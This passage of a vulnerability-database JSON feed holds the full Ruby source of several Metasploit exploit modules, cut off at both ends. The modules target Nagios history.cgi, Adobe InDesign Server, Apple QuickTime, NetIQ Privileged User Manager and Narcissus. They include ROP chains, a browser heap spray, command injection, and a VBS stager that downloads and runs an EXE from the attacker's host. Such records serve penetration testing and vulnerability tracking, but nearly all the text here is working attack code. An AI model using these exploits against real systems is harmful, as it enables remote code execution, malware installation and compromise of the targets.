+x #{tempfile};#{tempfile};rm -f #{tempfile}\"\n end\n host_value = cmd.gsub!(' ', '${IFS}')\n\n # Generate 'host' parameter value\n padding_size = mytarget['Offset'] - host_value.length\n host_value << 
rand_text_alphanumeric( padding_size )\n\n # Generate ROP\n host_value << mytarget['RopStack'].pack('V*')\n\n # Send exploit\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64(\"#{datastore['USER']}:#{datastore['PASS']}\") },\n 'vars_get' =>\n {\n 'host' => host_value\n }\n })\n\n if not res\n if session_created?\n print_status(\"Session created, enjoy!\")\n else\n print_error(\"No response from the server\")\n end\n return\n end\n\n if res.code == 401\n fail_with(Failure::NoAccess, \"Please specify correct values for USER and PASS\")\n end\n\n if res.code == 404\n fail_with(Failure::NotFound, \"Please specify the correct path to history.cgi in the TARGETURI parameter\")\n end\n\n print_status(\"Unknown response #{res.code}\")\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/nagios3_history_cgi.rb"}, {"lastseen": "2019-12-03T05:43:33", "bulletinFamily": "exploit", "description": "This module abuses the \"RunScript\" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX). 
The exploit drops the payload on the server and must be removed manually.\n", "modified": "2017-09-08T01:18:50", "published": "2012-12-04T21:04:21", "id": "MSF:EXPLOIT/MULTI/MISC/INDESIGN_SERVER_SOAP", "href": "", "type": "metasploit", "title": "Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',\n 'Description' => %q{\n This module abuses the \"RunScript\" procedure provided by the SOAP interface of\n Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).\n\n The exploit drops the payload on the server and must be removed manually.\n },\n 'Author' =>\n [\n 'h0ng10', # Vulnerability discovery / Metasploit module\n 'juan vazquez' # MacOSX target\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => %w{ osx win },\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 11 2012',\n 'References' =>\n [\n [ 'OSVDB', '87548'],\n [ 'URL', 'http://secunia.com/advisories/48572/' ]\n ],\n 'Targets' =>\n [\n [\n 'Indesign CS6 Server / Windows (64 bits)',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'win'\n }\n ],\n [\n 'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'osx'\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options( [ Opt::RPORT(12345) ])\n end\n\n\n def send_soap_request(script_code, script_type)\n script_code.gsub!(/&/, '&')\n soap_xml = %Q{\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" 
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:IDSP=\"http://ns.adobe.com/InDesign/soap/\">\n <SOAP-ENV:Body>\n <IDSP:RunScript>\n <IDSP:runScriptParameters>\n <IDSP:scriptText>#{script_code}</IDSP:scriptText>\n <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>\n </IDSP:runScriptParameters>\n </IDSP:RunScript>\n </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n}\n\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'POST',\n 'content-type' => 'application/x-www-form-urlencoded',\n 'data' => soap_xml,\n }, 5)\n end\n\n\n def check()\n # Use a very simple javascript\n check_var = rand_text_numeric(10)\n checkscript = 'returnValue = \"' + check_var + '\"'\n\n res = send_soap_request(checkscript, \"javascript\")\n\n return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type=\"xsd:string\">' + check_var + '</data>')\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n if target.name =~ /Windows/\n print_status(\"Creating payload vbs script\")\n encoded_payload = generate_payload_exe().unpack(\"H*\").join\n exe_file = Rex::Text.rand_text_alpha_upper(8) + \".exe\"\n wsf = Rex::Text.rand_text_alpha(8)\n payload_var = Rex::Text.rand_text_alpha(8)\n exe_name_var = Rex::Text.rand_text_alpha(8)\n file_var = Rex::Text.rand_text_alpha(8)\n byte_var = Rex::Text.rand_text_alpha(8)\n shell_var = Rex::Text.rand_text_alpha(8)\n\n # This one creates a smaller vbs payload (without deletion)\n vbs = %Q{\nSet #{wsf} = CreateObject(\"Scripting.FileSystemObject\")\n#{payload_var} = \"#{encoded_payload}\"\n#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + \"\\\\#{exe_file}\"\nSet #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)\nFor x = 1 To Len(#{payload_var})-3 Step 2\n #{byte_var} = Chr(38) & \"H\" & Mid(#{payload_var}, x, 2)\n #{file_var}.write Chr(#{byte_var})\nNext\n\n#{file_var}.write Chr(#{byte_var})\n#{file_var}.close\n\nSet #{shell_var} = 
CreateObject(\"Wscript.Shell\")\n#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False\nSet #{shell_var} = Nothing\nreturnValue = #{exe_name_var}\n }\n #\tvbs = Msf::Util::EXE.to_exe_vbs(exe)\n print_status(\"Sending SOAP request\")\n\n res = send_soap_request(vbs, \"visual basic\")\n if res != nil and res.body != nil then\n file_to_delete = res.body.to_s.scan(/<data xsi:type=\"xsd:string\">(.*)<\\/data><\\/scriptResult>/).flatten[0]\n print_warning \"Payload deployed to #{file_to_delete.to_s}, please remove manually\"\n end\n\n elsif target.name =~ /Mac OS X/\n\n print_status(\"Creating payload apple script\")\n\n exe_payload = generate_payload_exe\n b64_exe_payload = Rex::Text.encode_base64(exe_payload)\n b64_payload_name = rand_text_alpha(rand(5) + 5)\n payload_name = rand_text_alpha(rand(5) + 5)\n\n apple_script = %Q{\nset fp to open for access POSIX file \"/tmp/#{b64_payload_name}.txt\" with write permission\nwrite \"begin-base64 644 #{payload_name}\\n#{b64_exe_payload}\\n====\\n\" to fp\nclose access fp\ndo shell script \"uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt\"\ndo shell script \"rm /tmp/#{b64_payload_name}.txt\"\ndo shell script \"chmod +x /tmp/#{payload_name}\"\ndo shell script \"/tmp/#{payload_name}\"\nset returnValue to \"/tmp/#{payload_name}\"\n }\n\n print_status(\"Sending SOAP request\")\n\n res = send_soap_request(apple_script, \"applescript\")\n\n if res != nil and res.body != nil then\n file_to_delete = res.body.to_s.scan(/<data xsi:type=\"xsd:string\">(.*)<\\/data><\\/scriptResult>/).flatten[0]\n file_to_delete = \"/tmp/#{payload_name}\" if file_to_delete.nil? 
or file_to_delete.empty?\n print_warning \"Payload deployed to #{file_to_delete.to_s}, please remove manually\"\n elsif not res\n print_status \"No response, it's expected\"\n print_warning \"Payload deployed to /tmp/#{payload_name}, please remove manually\"\n end\n\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/indesign_server_soap.rb"}, {"lastseen": "2019-11-04T11:49:19", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.\n", "modified": "2017-10-05T21:44:36", "published": "2012-11-27T11:10:00", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/APPLE_QUICKTIME_MIME_TYPE", "href": "", "type": "metasploit", "title": "Apple QuickTime 7.7.2 MIME Type Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::RopDb\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :ua_name => HttpClients::SAFARI,\n # :ua_maxver => '5.0.1',\n # :ua_maxver => '5.1.7',\n # :javascript => true,\n # :rank => NormalRanking, # reliable memory corruption\n # :vuln_test => nil\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack\n based overflow occurs when processing a malformed Content-Type header. 
The module\n has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.\n },\n 'Author' =>\n [\n 'Pavel Polischouk', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-3753' ],\n [ 'OSVDB', '87088'],\n [ 'BID', '56438' ],\n [ 'URL', 'http://support.apple.com/kb/HT5581' ],\n [ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested with QuickTime 7.7.2\n [ 'Automatic', {} ],\n [ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',\n {\n 'OffsetFirstStackPivot' => 389,\n 'OffsetSecondStackPivot' => 105,\n 'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,\n 'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts\n 'SprayOffset' => 264,\n 'SprayedAddress' => 0x60130124\n }\n ],\n [ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',\n {\n 'OffsetFirstStackPivot' => 389,\n 'OffsetSecondStackPivot' => 105,\n 'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,\n 'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts\n 'SprayOffset' => 264,\n 'SprayedAddress' => 0x60130124\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 07 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ], self.class\n )\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n\n browser_name = \"\"\n if agent =~ /Safari/ and agent=~ /Version\\/5\\.1\\.7/\n browser_name = 
\"Safari 5.1.7\"\n elsif agent =~ /Safari/ and agent=~ /Version\\/5\\.0\\.5/\n browser_name = \"Safari 5.0.5\"\n end\n\n os_name = 'Windows XP SP3'\n\n targets.each do |t|\n if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def on_request_uri(client, request)\n\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported: #{agent}\")\n send_not_found(cli)\n return\n end\n\n return if ((p = regenerate_payload(client)) == nil)\n\n if request.uri =~ /\\.smil$/\n print_status(\"Sending exploit (target: #{my_target.name})\")\n smil = rand_text_alpha(20)\n type = rand_text_alpha_lower(1)\n subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])\n subtype << [my_target['SecondStackPivot']].pack(\"V\")\n subtype << [my_target['SprayedAddress']].pack(\"V\")\n subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)\n subtype << rand_text_alpha_lower(4)\n subtype << [my_target['FirstStackPivot']].pack(\"V\")\n subtype << rand_text_alpha_lower(10000 - subtype.length)\n send_response(client, smil, { 'Content-Type' => \"#{type}/#{subtype}\" })\n else\n print_status(\"Sending initial HTML\")\n url = ((datastore['SSL']) ? \"https://\" : \"http://\")\n url << ((datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])\n url << \":\" + datastore['SRVPORT'].to_s\n url << get_resource\n fname = rand_text_alphanumeric(4)\n\n code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))\n offset = rand_text(my_target['SprayOffset'])\n js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))\n fill = rand_text(4)\n js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))\n\n # Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html\n js = <<-JSSPRAY\nfunction heapSpray(offset, shellcode, fillsled) {\n var chunk_size, headersize, fillsled_len, code;\n var i, codewithnum;\n chunk_size = 0x40000;\n headersize = 0x10;\n fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);\n while (fillsled.length <fillsled_len)\n fillsled += fillsled;\n fillsled = fillsled.substring(0, fillsled_len);\n code = offset + shellcode + fillsled;\n heap_chunks = new Array();\n for (i = 0; i<1000; i++)\n {\n codewithnum = \"HERE\" + code;\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\n }\n}\nvar myoffset = unescape(\"#{js_offset}\");\nvar myshellcode = unescape(\"#{js_code}\");\nvar myfillsled = unescape(\"#{js_fill}\");\nheapSpray(myoffset,myshellcode,myfillsled);\n JSSPRAY\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n content = \"<html>\"\n content << \"<head><script>\"\n content << \"#{js}\"\n content << \"</script></head>\"\n content << \"<body>\"\n content << <<-ENDEMBED\n<OBJECT\nCLASSID=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\"\nWIDTH=\"1\"\nHEIGHT=\"1\"\nCODEBASE=\"http://www.apple.com/qtactivex/qtplugin.cab\">\n<PARAM name=\"SRC\" VALUE = \"#{url}/#{fname}.smil\">\n<PARAM name=\"QTSRC\" VALUE = \"#{url}/#{fname}.smil\">\n<PARAM name=\"AUTOPLAY\" VALUE = \"true\" >\n<PARAM 
name=\"TYPE\" VALUE = \"video/quicktime\" >\n<PARAM name=\"TARGET\" VALUE = \"myself\" >\n<EMBED\n SRC = \"#{url}/#{fname}.smil\"\n QTSRC = \"#{url}/#{fname}.smil\"\n TARGET = \"myself\"\n WIDTH = \"1\"\n HEIGHT = \"1\"\n AUTOPLAY = \"true\"\n PLUGIN = \"quicktimeplugin\"\n TYPE = \"video/quicktime\"\n CACHE = \"false\"\n PLUGINSPAGE= \"http://www.apple.com/quicktime/download/\" >\n</EMBED>\n</OBJECT>\n ENDEMBED\n content << \"</body></html>\"\n send_response(client, content, { 'Content-Type' => \"text/html\" })\n end\n\n # Handle the payload\n handler(client)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/apple_quicktime_mime_type.rb"}, {"lastseen": "2019-12-04T09:42:01", "bulletinFamily": "exploit", "description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager service (unifid.exe) to execute arbitrary perl code. The problem exists in the ldapagnt module. 
The module has been tested successfully on NetIQ PUM 2.3.1 over Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.\n", "modified": "2019-08-02T14:48:53", "published": "2012-11-20T22:15:21", "id": "MSF:EXPLOIT/WINDOWS/NOVELL/NETIQ_PUM_EVAL", "href": "", "type": "metasploit", "title": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/file_dropper'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',\n 'Description' => %q{\n This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. 
The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.\n },\n 'Author' => [\n 'rgod', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-5932' ],\n [ 'OSVDB', '87334' ],\n [ 'BID', '56539' ],\n [ 'EDB', '22738' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Targets' =>\n [\n ['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', { }],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 15 2012'\n ))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])\n ])\n\n self.needs_cleanup = true\n end\n\n def check\n data = fake_login\n\n print_status(\"Sending fake login request...\")\n\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"application/x-amf\",\n 'headers' => {\n \"x-flash-version\" => \"11,4,402,278\"\n },\n 'data' => data,\n })\n\n if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\\.3\\.1/\n return Exploit::CheckCode::Appears\n elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n end\n\n @dropped_files.delete_if do |file|\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n if session.type == \"meterpreter\"\n begin\n windir = session.sys.config.getenv('WINDIR')\n win_file = \"#{windir}\\\\system32\\\\#{win_file}\"\n # Meterpreter should do this automatically as part of\n # fs.file.rm(). 
Until that has been implemented, remove the\n # read-only flag with a command.\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n false\n end\n\n end\n end\n\n end\n\n # Handle incoming requests from the target\n def on_request_uri(cli, request)\n\n vprint_status(\"on_request_uri called\")\n\n if (not @exe_data)\n print_error(\"A request came in, but the EXE archive wasn't ready yet!\")\n return\n end\n\n print_good(\"Sending the EXE payload to the target...\")\n send_response(cli, @exe_data)\n @exe_sent = true\n end\n\n def lookup_lhost()\n # Get the source address\n if datastore['SRVHOST'] == '0.0.0.0'\n Rex::Socket.source_address('50.50.50.50')\n else\n datastore['SRVHOST']\n end\n end\n\n def fake_login\n data = \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x15\\x53\\x50\\x46\\x2e\\x55\\x74\" # ..........SPF.Ut\n data << \"\\x69\\x6c\\x2e\\x63\\x61\\x6c\\x6c\\x4d\\x6f\\x64\\x75\\x6c\\x65\\x45\\x78\\x00\" # il.callModuleEx.\n data << \"\\x02\\x2f\\x34\\x00\\x00\\x00\\x64\\x0a\\x00\\x00\\x00\\x01\\x03\\x00\\x03\\x70\" # ./4...d........p\n data << \"\\x6b\\x74\\x03\\x00\\x0b\\x43\\x72\\x65\\x64\\x65\\x6e\\x74\\x69\\x61\\x6c\\x73\" # kt...Credentials\n data << \"\\x03\\x00\\x04\\x6e\\x61\\x6d\\x65\\x02\\x00\\x04\\x74\\x65\\x73\\x74\\x00\\x06\" # ...name...test..\n data << \"\\x70\\x61\\x73\\x73\\x77\\x64\\x02\\x00\\x04\\x74\\x65\\x73\\x74\\x00\\x00\\x09\" # passwd...test...\n data << \"\\x00\\x06\\x6d\\x65\\x74\\x68\\x6f\\x64\\x02\\x00\\x05\\x6c\\x6f\\x67\\x69\\x6e\" # ..method...login\n data << \"\\x00\\x06\\x6d\\x6f\\x64\\x75\\x6c\\x65\\x02\\x00\\x04\\x61\\x75\\x74\\x68\\x00\" # ..module...auth.\n data << \"\\x03\\x75\\x69\\x64\\x06\\x00\\x00\\x09\\x00\\x00\\x09\"; # .uid.......\n return data\n end\n\n def exploit\n\n data = fake_login\n\n print_status(\"Sending fake login request...\")\n res = send_request_cgi(\n {\n 'uri' => '/',\n 
'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"application/x-amf\",\n 'headers' => {\n \"x-flash-version\" => \"11,4,402,278\"\n },\n 'data' => data,\n })\n\n if not res or res.code != 200 or res.body !~ /svc(.+)/\n fail_with(Failure::Unknown, 'Fake Login failed, svc not identified')\n end\n\n svc = $1\n svc_length = svc[1, 2].unpack(\"n\")[0]\n svc_name = svc[3, svc_length]\n vprint_status(\"SVC Found: #{svc_name}\")\n\n print_status(\"Generating the EXE Payload...\")\n @exe_data = generate_payload_exe\n exename = Rex::Text.rand_text_alpha(1+rand(2))\n\n print_status(\"Setting up the Web Service...\")\n datastore['SSL'] = false\n resource_uri = '/' + exename + '.exe'\n service_url = \"http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}\"\n print_status(\"Starting up our web service on #{service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n datastore['SSL'] = true\n\n # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/\n vbs_stage = Rex::Text.rand_text_alpha(3+rand(5))\n code = \"system(\\\"echo Set F=CreateObject(\\\\\\\"Microsoft.XMLHTTP\\\\\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo F.Open \\\\\\\"GET\\\\\\\",\\\\\\\"#{service_url}\\\\\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo Set IA=CreateObject(\\\\\\\"ADODB.Stream\\\\\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.SaveToFile \\\\\\\"%WINDIR%\\\\system32\\\\#{exename}.exe\\\\\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code 
<< \"system(\\\"echo CreateObject(\\\\\\\"WScript.Shell\\\\\\\").Run \\\\\\\"%WINDIR%\\\\system32\\\\#{exename}.exe\\\\\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"#{vbs_stage}.vbs\\\");\"\n register_file_for_cleanup(\"#{vbs_stage}.vbs\")\n register_file_for_cleanup(\"#{exename}.exe\")\n identity = \"\"\n\n data = \"\\x00\\x00\\x00\\x00\\x00\\x01\"\n data << \"\\x00\\x14\"\n data << \"SPF.Util.callModuleA\"\n data << \"\\x00\\x00\"\n data << \"\\x00\"\n data << \"\\x00\\x02\"\n data << \"\\x0a\\x0a\"\n data << \"\\x00\\x00\\x00\\x01\\x03\"\n data << \"\\x00\\x03\"\n data << \"pkt\"\n data << \"\\x03\"\n data << \"\\x00\\x06\"\n data << \"method\"\n data << \"\\x02\"\n data << \"\\x00\\x04\"\n data << \"eval\"\n data << \"\\x00\\x06\"\n data << \"module\"\n data << \"\\x02\"\n data << \"\\x00\\x08\"\n data << \"ldapagnt\"\n data << \"\\x00\\x04\"\n data << \"Eval\"\n data << \"\\x03\"\n data << \"\\x00\\x07\"\n data << \"content\"\n data << \"\\x02\"\n data << [code.length + 4].pack(\"n\")\n data << code\n data << \"\\x0a\\x0a1;\\x0a\\x0a1;\"\n data << \"\\x00\\x00\\x09\"\n data << \"\\x00\\x00\\x09\"\n data << \"\\x00\\x03\"\n data << \"uid\"\n data << \"\\x02\"\n data << [identity.length].pack(\"n\")\n data << identity\n data << \"\\x00\\x00\\x09\"\n data << \"\\x00\\x08\"\n data << \"svc_name\"\n data << \"\\x02\"\n data << [svc_name.length].pack(\"n\")\n data << svc_name\n data << \"\\x00\\x00\\x09\"\n\n print_status(\"Sending the eval code request...\")\n\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"application/x-amf\",\n 'headers' => {\n \"x-flash-version\" => \"11,4,402,278\"\n },\n 'data' => data,\n })\n\n if res\n fail_with(Failure::Unknown, \"There was an unexpected response to the code eval request\")\n else\n print_good(\"There wasn't a response, but this is the expected behavior...\")\n end\n\n # wait for the data to be sent\n print_status(\"Waiting for the victim to 
request the EXE payload...\")\n\n waited = 0\n while (not @exe_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"Target didn't request request the EXE payload -- Maybe it cant connect back to us?\")\n end\n end\n\n print_status(\"Giving time to the payload to execute...\")\n select(nil, nil, nil, 20)\n\n print_status(\"Shutting down the web service...\")\n stop_service\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/novell/netiq_pum_eval.rb"}, {"lastseen": "2019-11-26T04:51:01", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Narcissus image configuration function. This is due to the backend.php file not handling the $release parameter properly, and then passes it on to the configure_image() function. In this function, the $release parameter can be used to inject system commands for passthru (a PHP function that's meant to be used to run a bash script by the vulnerable application), which allows remote code execution under the context of the web server.\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-19T21:12:57", "id": "MSF:EXPLOIT/UNIX/WEBAPP/NARCISSUS_BACKEND_EXEC", "href": "", "type": "metasploit", "title": "Narcissus Image Configuration Passthru Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Narcissus Image Configuration Passthru Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Narcissus image configuration\n function. 
This is due to the backend.php file not handling the $release parameter\n properly, and then passes it on to the configure_image() function. In this\n function, the $release parameter can be used to inject system commands for\n passthru (a PHP function that's meant to be used to run a bash script by the\n vulnerable application), which allows remote code execution under the context\n of the web server.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Dun', #Original\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n [ 'EDB', '22709' ],\n [ 'OSVDB', '87410' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x0d\\x0a\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl ruby python netcat netcat-e'\n },\n },\n 'Platform' => %w{ linux unix },\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n ['Narcissus', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Nov 14 2012\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])\n ])\n end\n\n def base\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n return uri\n end\n\n def remote_exe(command)\n res = send_request_cgi({\n 'uri' => \"#{base}backend.php\",\n 'method' => 'POST',\n 'encode_params' => false,\n 'vars_post' => {\n 'machine' => '0',\n 'action' => 'configure_image',\n 'release' => \"|#{command}\"\n }\n })\n\n vprint_line(res.body) if res\n return res\n end\n\n def check\n sig = rand_text_alpha(rand(10) + 5) #The string to check\n\n vprint_status(\"Looking for signature '#{sig}'...\")\n res = remote_exe(\"echo #{sig}\")\n\n if res and res.body =~ /#{sig}/\n vprint_status(\"Signature '#{sig}' found.\")\n return Exploit::CheckCode::Vulnerable\n else\n vprint_status(\"Signature not found\")\n return 